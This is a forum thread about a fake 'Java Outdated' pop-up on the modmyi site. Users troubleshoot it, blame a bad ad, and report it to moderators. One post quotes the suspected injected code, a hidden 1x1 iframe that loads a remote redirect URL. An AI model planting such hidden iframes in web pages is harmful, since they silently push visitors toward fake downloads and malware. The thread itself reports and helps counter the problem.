Thread: modmyi Hacked?

  1. #1
    Exclamation modmyi Hacked?
Am I the only one getting the crappy 'Java Outdated' message on modmyi?
For me, its only happening on modmyi - no other site I visit.

After investigating the code, this appears to be the suspect:
    <iframe src="http://dl81.shstny.com/topic/java/go.php?code=java&amp;country=ZA&amp;aid=87" frameborder="0" scrolling="no" width="1" height="1"></iframe>

// this is happening both on my computer and laptop, so either both are compromised or mmi is...

Haven't seen it or heard of anyone else experiencing the issue. Someone else may post up if it's a site issue.

This is blatant malware and it's impersonating the Java site. This website doesn't even use Java, so it's an even better indicator that it's fake. Your system is compromised, or MMi has a bad ad cycling through. If this is occurring on your desktop and laptop, I would have to believe that this is just a bad ad and therefore, I wouldn't worry about it. To be safe though, download and run Malwarebytes or another malware scanner and see if it finds anything.

Report the ad if you can, just take a screenshot and grab the link from the inspector and then use this form.

Same thing for me. That site is getting really annoying. Every page of MMI I visit, that pop-up appears. Only option is to click OK or X and both goes to that website.

Press ESC on your keyboard, but dont stop there as it tries to go to it anyway, so press ESC again to abort the redirect. Still. Very annoying.
I checked/scanned my PCs and no malware was found and I have AV as well. Pretty sure this is a MMI issue.

Yes I know I can use ESC and repeatedly press it to get rid of it and stop it from going to the malware site but point being, its annoying and its not only my PC being affected. Hope they fix this soon.

They can't fix it if you guys don't report it. I use AdBlock on here because the ads are so incredibly annoying all the time...

Please post a screen shot of the ad if you get it. I turned one in to Kyle that I had a member send me a few days ago.
More input and screenies helps us out a bunch.
